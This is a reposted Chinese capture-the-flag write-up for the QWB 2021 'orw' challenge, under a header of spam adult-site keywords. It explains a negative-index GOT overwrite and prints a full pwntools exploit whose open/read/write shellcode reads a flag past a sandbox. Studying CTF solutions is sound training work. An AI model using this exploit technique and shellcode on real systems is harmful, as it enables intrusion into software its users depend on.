日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

强网杯2021 [强网先锋]orw

發布時間:2025/3/20 编程问答 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 强网杯2021 [强网先锋]orw 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

orw就是指你的系統調用被禁止了,不能通過子進程去獲得權限和flag,只能在該進程通過 open , read ,write來得到flag

因為不是FULL RELRO所以就考慮改got表為shellcode地址就行了



漏洞點就在于以上兩點

令index下標為負數時可以覆蓋到其他函數的got表地址

這里選擇覆蓋掉exit的got表中的地址,因為沙盒的存在,所以需要構造orw的shellcode并覆蓋exit的got地址為shellcode

覆蓋堆塊的申請位置選擇在這里

計算一下偏移量


起始點 0x02020E0 終點是 0x0202078


這里除以8是因為
QWORD 是8 個字節

現在可以寫EXP

from pwn import * #p=process('./pwn') p=remote("39.105.131.68","12354") context(os='linux',arch='amd64') shellcode='''xor rax,raxxor rdi,rdixor rsi,rsixor rdx,rdxmov rax,2 #open 調用號為2mov rdi,0x67676c662f2e #為 galf/. 是./flag的相反push rdimov rdi,rspsyscallmov rdx,0x100 #sys_read(3,file,0x100)mov rsi,rdimov rdi,raxmov rax,0 #read 調用號0syscallmov rdi,1 #sys_write(1,file,0x30)mov rax,1 #write調用號是1syscall ''' p.recv() p.sendline('1') p.recvuntil('index') p.sendline('-0xd') p.recvuntil('size:') p.sendline('0') p.recvuntil('content') p.sendline(asm(shellcode)) #gdb.attach(p) p.sendline('5') p.interactive()

總結

以上是生活随笔為你收集整理的强网杯2021 [强网先锋]orw的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。